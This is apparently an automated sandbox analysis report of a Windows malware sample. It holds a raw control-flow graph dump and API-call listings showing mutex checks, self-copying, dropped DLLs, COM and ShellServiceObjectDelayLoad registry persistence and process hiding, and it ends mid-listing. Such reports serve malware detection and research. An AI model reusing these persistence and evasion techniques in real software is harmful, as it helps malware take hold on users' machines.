3048->3049 3050 404570 3049->3050 3051 404579 3050->3051 3052 404596 lstrlenA LocalAlloc GetTempPathA 3050->3052 3053 404589 LocalFree 3050->3053 3051->3031 3051->3032 3054 404604 3052->3054 3053->3051 3054->3054 3055 4015ea rand 3054->3055 3056 40461d strcat sprintf rand 3055->3056 3057 404655 strcat 3056->3057 3058 404668 rand 3056->3058 3057->3058 3059 40467a rand sprintf 3058->3059 3060 40469d rand 3058->3060 3059->3060 3061 4046bb strcat 3060->3061 3062 4046ce strcat rand 3060->3062 3061->3062 3063 4046f3 strcat 3062->3063 3064 404706 rand 3062->3064 3063->3064 3065 404741 sprintf rand 3064->3065 3066 40471e rand sprintf 3064->3066 3067 404770 strcat 3065->3067 3068 404783 strcat rand 3065->3068 3066->3065 3067->3068 3069 4047a8 strcat 3068->3069 3070 4047bb strcat rand 3068->3070 3069->3070 3071 4047e6 rand sprintf 3070->3071 3072 404809 rand sprintf sprintf rand 3070->3072 3071->3072 3073 404859 rand sprintf 3072->3073 3074 40487c rand 3072->3074 3073->3074 3075 404894 strcat 3074->3075 3076 4048a7 rand 3074->3076 3075->3076 3077 4048b9 strcat 3076->3077 3078 4048cc rand 3076->3078 3077->3078 3079 4048f1 sprintf rand 3078->3079 3080 4048de strcat 3078->3080 3081 404926 strcat 3079->3081 3082 404939 rand 3079->3082 3080->3079 3081->3082 3083 40494b strcat 3082->3083 3084 40495e rand 3082->3084 3083->3084 3085 404976 rand sprintf 3084->3085 3086 404999 3084->3086 3085->3086 3090 4049a3 3086->3090 3113 404b12 3086->3113 3087 404b07 3089 404c87 strcat rand 3087->3089 3088 4043bf 2 API calls 3088->3113 3091 404cac strcat 3089->3091 3092 404cbf rand 3089->3092 3090->3087 3093 404a4b sprintf rand 3090->3093 3094 4049d9 sprintf 3090->3094 3091->3092 3095 404cd1 strcat 3092->3095 3096 404ce4 rand 3092->3096 3097 404a82 strcat 3093->3097 3098 404a95 rand 3093->3098 3094->3090 3095->3096 3100 404cf6 strcat 3096->3100 3101 404d09 strcat rand 3096->3101 3097->3098 3102 404aa7 strcat 3098->3102 3103 404aba rand 3098->3103 3099 404b47 sprintf 3099->3113 3100->3101 3104 404d34 rand sprintf 3101->3104 3105 404d57 rand 3101->3105 3102->3103 3103->3090 3106 404acc strcat 3103->3106 3104->3105 3107 404d69 strcat 3105->3107 3108 404d7c rand 3105->3108 3106->3090 3107->3108 3109 404da1 rand 3108->3109 3110 404d8e strcat 3108->3110 3111 404db9 strcat 3109->3111 3112 404dcc rand 3109->3112 3110->3109 3111->3112 3114 404e01 strcat rand 3112->3114 3115 404dde rand sprintf 3112->3115 3113->3088 3113->3089 3113->3099 3140 40447a lstrlenA LocalAlloc 3113->3140 3117 404e2c strcat 3114->3117 3118 404e3f strcat rand 3114->3118 3115->3114 3117->3118 3120 404e64 strcat 3118->3120 3121 404e77 strcat rand 3118->3121 3120->3121 3124 404ea2 strcat 3121->3124 3125 404eb5 sprintf rand 3121->3125 3122 404c02 rand 3126 404c14 strcat 3122->3126 3127 404c27 rand 3122->3127 3123 404bef strcat 3123->3122 3124->3125 3130 404ee3 strcat 3125->3130 3131 404ef6 strcat rand 3125->3131 3126->3127 3128 404c39 strcat 3127->3128 3129 404c4c LocalFree 3127->3129 3128->3129 3129->3113 3130->3131 3132 404f27 strcat 3131->3132 3133 404f3a rand sprintf rand 3131->3133 3132->3133 3134 404f77 strcat 3133->3134 3135 404f8a strcat rand 3133->3135 3134->3135 3136 404fb5 strcat 3135->3136 3137 404fc8 rand 3135->3137 3136->3137 3138 404fda rand sprintf 3137->3138 3139 404ffd 7 API calls 3137->3139 3138->3139 3139->3051 3141 4044b6 3140->3141 3142 4044d9 sprintf 3141->3142 3143 40452a sprintf rand 3141->3143 3142->3141 3143->3122 3143->3123 3144 401b33 3147 401aa4 3144->3147 3145 401b13 3146 401ae6 sprintf 3149 40129c 3146->3149 3147->3145 3147->3146 3150 4012a9 CreateFileA 3149->3150 3151 4079e4 3149->3151 3152 4012db ReadFile CloseHandle 3150->3152 3153 4012d7 3150->3153 3151->3150 3152->3153 3153->3145 3154 4036b3 CreateFileA 3155 4036e3 3154->3155 3156 4036e7 SetFilePointer 3154->3156 3157 403701 3156->3157 3157->3157 3158 403708 WriteFile WriteFile CloseHandle 3157->3158 3158->3155 2764 406ff6 2765 4071a4 2764->2765 2766 40701f 2764->2766 2767 40717e 2765->2767 2768 4071be DestroyWindow 2765->2768 2769 407021 2766->2769 2770 40702f 2766->2770 2768->2767 2771 407184 2769->2771 2772 40702a 2769->2772 2773 407289 GetWindowTextA 2770->2773 2774 40703a 2770->2774 2771->2767 2777 407198 PostQuitMessage 2771->2777 2778 4077cc DefWindowProcA 2772->2778 2775 4072c9 GetWindowTextA 2773->2775 2776 4072a9 MessageBoxA SetFocus 2773->2776 2779 407041 2774->2779 2780 40705c 2774->2780 2781 407322 2775->2781 2782 407302 MessageBoxA SetFocus 2775->2782 2776->2767 2777->2767 2778->2767 2779->2772 2779->2778 2784 4071cb 2779->2784 2783 407149 2780->2783 2820 405ffa 2780->2820 2788 407337 MessageBoxA SetFocus 2781->2788 2797 407357 2781->2797 2782->2767 2783->2767 2827 406075 2783->2827 2784->2767 2790 407224 SetTextColor 2784->2790 2792 407233 SetTextColor 2784->2792 2788->2767 2789 405ffa 3 API calls 2791 40709b GetWindowRect 2789->2791 2793 40723d SetBkColor CreateBrushIndirect 2790->2793 2791->2783 2794 4070be GetWindowRect 2791->2794 2792->2793 2793->2767 2794->2783 2796 4070d4 2794->2796 2795 4073a7 sprintf GetWindowTextA 2799 40740f sprintf GetWindowTextA 2795->2799 2800 4073ef MessageBoxA SetFocus 2795->2800 2796->2783 2803 407112 MoveWindow 2796->2803 2797->2795 2798 407376 MessageBoxA SetFocus 2797->2798 2798->2767 2801 407477 sprintf GetWindowTextA 2799->2801 2802 407457 MessageBoxA SetFocus 2799->2802 2800->2767 2804 4074d9 2801->2804 2805 4074b9 MessageBoxA SetFocus 2801->2805 2802->2767 2803->2783 2806 4074ee MessageBoxA SetFocus 2804->2806 2808 40750e 2804->2808 2805->2767 2806->2767 2807 40755e sprintf GetWindowTextA 2810 4075c6 2807->2810 2811 4075a6 MessageBoxA SetFocus 2807->2811 2808->2807 2809 40752d MessageBoxA SetFocus 2808->2809 2809->2767 2812 407627 sprintf CreateFileA SetFilePointer 2810->2812 2813 4075e5 MessageBoxA SetFocus 2810->2813 2811->2767 2814 40768e 2812->2814 2813->2767 2814->2814 2815 407695 WriteFile WriteFile 2814->2815 2816 4076db 2815->2816 2816->2816 2817 4076e2 6 API calls 2816->2817 2818 40776e 2817->2818 2818->2818 2819 407775 WriteFile WriteFile CloseHandle ShowWindow 2818->2819 2819->2767 2821 4079e4 2820->2821 2822 406007 GetWindow 2821->2822 2825 406020 2822->2825 2823 406028 GetClassNameA 2823->2825 2824 406024 2824->2789 2825->2823 2825->2824 2826 40605f GetWindow 2825->2826 2826->2825 2828 405ffa 3 API calls 2827->2828 2829 406096 2828->2829 2830 405ffa 3 API calls 2829->2830 2831 4060a3 10 API calls 2830->2831 2832 406224 SendMessageA 2831->2832 2833 40623a SendMessageA 2831->2833 2834 40624e CreateWindowExA CreateWindowExA 2832->2834 2833->2834 2835 406333 2834->2835 2836 4062cb sprintf SendMessageA sprintf SendMessageA 2835->2836 2837 40633c 34 API calls 2835->2837 2836->2835 2837->2767 2974 401219 2975 40121f __GetMainArgs 2974->2975 2976 407980 173 API calls 2975->2976 2977 401284 exit 2976->2977 2978 40109a 2986 40109b 2978->2986 2979 40117f 2980 40118e signal 2979->2980 2981 4011a8 signal 2980->2981 2982 4011c9 2980->2982 2981->2982 2983 40117b 2981->2983 2982->2983 2984 4011ce signal raise 2982->2984 2984->2983 2986->2979 2986->2980 2986->2983 2987 40107a RtlUnwind 2986->2987 2987->2986 2838 40237b 2839 402333 _sleep 2838->2839 2840 402355 2838->2840 2841 401b9f 23 API calls 2839->2841 2842 40234c 2841->2842 2842->2839 2842->2840 2988 40109b 2989 40117f 2988->2989 2996 4010c3 2988->2996 2990 40118e signal 2989->2990 2991 4011a8 signal 2990->2991 2992 4011c9 2990->2992 2991->2992 2993 40117b 2991->2993 2992->2993 2994 4011ce signal raise 2992->2994 2994->2993 2996->2990 2996->2993 2997 40107a RtlUnwind 2996->2997 2997->2996 2998 40129b 2999 4079e4 2998->2999 3000 4012a9 CreateFileA 2999->3000 3001 4012db ReadFile CloseHandle 3000->3001 3002 4012d7 3000->3002 3001->3002 2714 40365e 2715 403664 GetFileSize LocalAlloc 2714->2715 2716 403684 ReadFile CloseHandle 2715->2716 2718 4036ae 2716->2718 2533 40121f __GetMainArgs 2536 407980 GetCommandLineA 2533->2536 2537 407991 strchr 2536->2537 2541 4079a6 2536->2541 2538 4079cf GetModuleHandleA 2537->2538 2537->2541 2542 406c29 OpenMutexA 2538->2542 2541->2538 2543 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2542->2543 2544 406c5f CloseHandle exit 2542->2544 2545 406cd6 2543->2545 2544->2543 2546 406ce4 rand 2545->2546 2547 406e07 9 API calls 2545->2547 2549 406d5f 2546->2549 2589 402e06 2547->2589 2551 406d69 rand 2549->2551 2552 406d2f rand 2549->2552 2553 406d8a sprintf CopyFileA 2551->2553 2554 406d7c 2551->2554 2552->2549 2566 403ce9 rand 2553->2566 2554->2553 2555 406f65 2605 4023a7 CreateThread CloseHandle 2555->2605 2556 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2556->2555 2560 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2562 406fdc GetMessageA 2560->2562 2657 4068b0 2560->2657 2675 40682b 2560->2675 2563 406fc4 TranslateMessage DispatchMessageA 2562->2563 2564 401284 exit 2562->2564 2563->2562 2567 403d27 2566->2567 2568 403d2e 2566->2568 2577 403f68 rand 2567->2577 2606 403619 CreateFileA 2568->2606 2571 403d47 memcpy memset 2573 403da1 rand rand rand rand memcpy 2571->2573 2574 403e64 2573->2574 2612 403bbe 2574->2612 2578 404002 2577->2578 2579 403fd4 rand 2578->2579 2580 404009 rand 2578->2580 2579->2578 2581 40402a 6 API calls 2580->2581 2582 40401c 2580->2582 2617 404148 RegCreateKeyExA 2581->2617 2582->2581 2584 4040f5 2585 404148 3 API calls 2584->2585 2586 404125 2585->2586 2587 404148 3 API calls 2586->2587 2588 40413a WinExec ExitProcess 2587->2588 2590 402e13 2589->2590 2620 402822 6 API calls 2590->2620 2592 402e1b GetVersion 2593 402e2e 2592->2593 2594 402e79 LoadLibraryA GetProcAddress 2593->2594 2604 402ef6 2593->2604 2594->2593 2595 4033ce GetVersion 2595->2555 2595->2556 2596 4030e5 GetModuleHandleA 2596->2604 2598 40314c VirtualQuery 2599 4031b1 IsBadWritePtr 2598->2599 2598->2604 2599->2604 2600 402f98 GlobalMemoryStatus 2600->2604 2601 402f6f IsBadReadPtr 2601->2604 2603 403059 CloseHandle 2603->2604 2604->2595 2604->2596 2604->2598 2604->2600 2604->2601 2604->2603 2621 40289a 2604->2621 2625 402cd7 2604->2625 2605->2560 2634 4022ee 2605->2634 2607 403664 GetFileSize LocalAlloc 2606->2607 2608 40364e 2606->2608 2609 403684 ReadFile CloseHandle 2607->2609 2608->2607 2611 4036ae 2608->2611 2609->2611 2611->2567 2611->2571 2613 403bfd 2612->2613 2614 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2613->2614 2615 403c20 rand 2613->2615 2616 403c80 memset memcpy memcpy 2613->2616 2614->2567 2615->2613 2616->2613 2618 404193 2617->2618 2618->2618 2619 40419a RegSetValueExA RegCloseKey 2618->2619 2619->2584 2620->2592 2622 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2621->2622 2624 4029cd 2622->2624 2624->2604 2626 402ceb 2625->2626 2628 402d13 2626->2628 2629 402a72 2626->2629 2628->2604 2632 402a89 2629->2632 2630 402cd2 2630->2628 2631 402b2a GetModuleHandleA GetProcAddress 2631->2632 2632->2630 2632->2631 2633 402cad GetCurrentProcessId 2632->2633 2633->2632 2635 402333 _sleep 2634->2635 2639 401b9f 2635->2639 2655 4079e4 2639->2655 2656 4079e5 2655->2656 2656->2656 2658 4068c7 2657->2658 2660 406c0c _sleep 2658->2660 2661 403619 5 API calls 2658->2661 2663 406c01 LocalFree 2658->2663 2664 406941 sscanf 2658->2664 2666 4069a4 sprintf sprintf 2658->2666 2667 4069db GetWindowsDirectoryA sprintf strcat 2658->2667 2668 406a84 atoi 2658->2668 2671 406add lstrlenA 2658->2671 2672 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2658->2672 2673 406b9b lstrlenA 2658->2673 2674 406bbe CreateThread CloseHandle 2658->2674 2679 405f5b lstrlenA lstrlenA LocalAlloc 2658->2679 2684 4043bf 2658->2684 2660->2658 2661->2658 2663->2660 2664->2658 2665 406972 rand 2664->2665 2665->2658 2669 406a27 DeleteFileA sprintf WinExec 2666->2669 2667->2669 2668->2658 2670 406aad sprintf 2668->2670 2669->2658 2670->2658 2671->2658 2672->2658 2673->2658 2674->2658 2676 40683b 2675->2676 2692 406753 CreateFileA 2676->2692 2690 407a04 2679->2690 2681 405f9b lstrlenA 2691 407a04 2681->2691 2683 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2683->2658 2685 4043dc 2684->2685 2686 40441a 2685->2686 2687 4043e2 memcpy 2685->2687 2688 404441 lstrlenA 2686->2688 2689 40442f 2686->2689 2687->2689 2688->2689 2689->2658 2690->2681 2691->2683 2693 40678f GetFileSize CloseHandle 2692->2693 2699 40681a _sleep 2692->2699 2700 4013cc RegOpenKeyExA 2693->2700 2699->2676 2701 4013fa 2700->2701 2702 4013fe RegQueryValueExA RegCloseKey 2700->2702 2701->2699 2703 4054d7 6 API calls 2701->2703 2702->2701 2704 405586 2703->2704 2705 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2704->2705 2706 40560e 2705->2706 2706->2699 2707 401348 RegCreateKeyExA 2706->2707 2708 40138a RegSetValueExA RegCloseKey 2707->2708 2709 401386 2707->2709 2708->2709 2709->2699

                            Executed Functions

                            Function 00406C29 Relevance: 82.5, APIs: 36, Strings: 11, Instructions: 264windowthreadregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE
                            Function 00403619 Relevance: 7.6, APIs: 5, Instructions: 58filememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D
                            Function 00403F68 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 135fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Odekfoij,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Odekfoij,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Odekfoij,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Odekfoij,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Odekfoij$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-3115103061
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69
                            Function 00403CE9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD
                            Function 00404148 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
